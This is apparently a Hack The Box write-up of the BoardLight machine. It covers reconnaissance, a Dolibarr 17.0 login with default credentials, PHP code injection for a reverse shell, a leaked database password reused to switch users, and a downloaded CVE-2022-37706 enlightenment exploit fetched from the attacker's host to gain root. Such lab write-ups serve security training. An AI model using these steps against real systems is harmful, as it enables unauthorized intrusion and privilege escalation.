Post

Htb_boardlight

Posted
By 0xWhoami35 5 min read

title: “HTB BoardLight Writeup” date: 2024-05-26 00:30:00 categories: HTB Machine tags: Default_user_pass PHP Code Injection Binary_exploitation CVE —

Shell as www-data

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

─# nmap -sC -sV -p- -T4 --min-rate=9326 --vv board.htb           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-26 10:51 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
Initiating Ping Scan at 10:51
Scanning board.htb (10.10.11.11) [4 ports]
Completed Ping Scan at 10:51, 0.28s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:51
Scanning board.htb (10.10.11.11) [65535 ports]
Discovered open port 22/tcp on 10.10.11.11
Discovered open port 80/tcp on 10.10.11.11

only port 22,80 are open so that’s nothing maybe i’ll try enum using subdo enum because on board.htb only landing page so i think the vulnerability on subdomain board.htb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://board.htb" -H "HOST: FUZZ.board.htb" -c -fs 15949

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://board.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.board.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 15949
________________________________________________

crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 268ms]
web3452                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 329ms]
web4000                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 334ms]
wishlist                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 332ms]

Now add crm.board.htb in /etc/hosts

Identify Vulnerability

The Version of Dolibar is 17.0 so let we research about this vendor to see the vendor vulnerable or not

In Dolibarr 17.0.0 with the CMS Website plugin (core) enabled, an authenticated attacker can obtain remote command execution via php code injection bypassing the application restrictions.

The CMS are vulnerable PHP Code injection but it’s authenticated

1
2
3
4

 The default username and password for Dolibarr, a popular open-source ERP and CRM software, often depend on how it was installed and set up. However, the typical default credentials are:

    Username: admin
    Password: admin

as you can see here the user pass default is admin .

After i put that’s credentials , i successfully login to dashboard

PHP Code Injection

Now click Websiteand > click + > and create your site > Import website template > Click Load anything template it’s ok > Edit page

and put your php revshell code

And click saved

1
2
3
4
5
6
7
8
9
10
11
12

└─# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.110] from (UNKNOWN) [10.10.11.11] 46260
Linux boardlight 5.15.0-107-generic #117~20.04.1-Ubuntu SMP Tue Apr 30 10:35:57 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 08:55:52 up 40 min,  4 users,  load average: 0.62, 0.46, 0.52
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (856): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell as larissa

After i research on google about “Where the location Dolibarr default config” i got this page

Dolibar Config Location

Login larissa user using mysql config dolibarr

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
cat conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';

the path is conf/conf.php

1
2
3
4
5

www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ su larissa
su larissa
Password: serverfun2$2023!!
id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)

Shell as root

1
2
3
4
5
6
7
8
9
10

find / -perm -04000 -ls 2>/dev/null 
     2491     16 -rwsr-xr-x   1 root     root        14488 Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
      608     16 -rwsr-sr-x   1 root     root        14488 Apr  8 18:36 /usr/lib/xorg/Xorg.wrap
    17633     28 -rwsr-xr-x   1 root     root        26944 Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
    17628     16 -rwsr-xr-x   1 root     root        14648 Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
    17627     16 -rwsr-xr-x   1 root     root        14648 Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
    17388     16 -rwsr-xr-x   1 root     root        14648 Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
     2368     52 -rwsr-xr--   1 root     messagebus    51344 Oct 25  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
     5278    468 -rwsr-xr-x   1 root     root         477672 Jan  2 09:13 /usr/lib/openssh/ssh-keysign
    10039    388 -rwsr-xr--   1 root     dip          395144 Jul 23  2020 /usr/sbin/pppd

Do you see what i see?? yupp that’s enlightenment binary , i had saw about this binary vulnerability a few month ago and also have tried to download this binary in my ubuntu and trying to priv esc and it’s working

CVE-2022-37706-LPE-exploit

CVE-2022-37706-LPE-exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

wget http://10.10.14.110:8000/eng.sh
--2024-05-26 08:47:03--  http://10.10.14.110:8000/eng.sh
Connecting to 10.10.14.110:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 707 [text/x-sh]
Saving to: ‘eng.sh’

     0K                                                       100% 41.3M=0s

2024-05-26 08:47:04 (41.3 MB/s) - ‘eng.sh’ saved [707/707]

bash eng.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
This post is licensed under CC BY 4.0 by the author.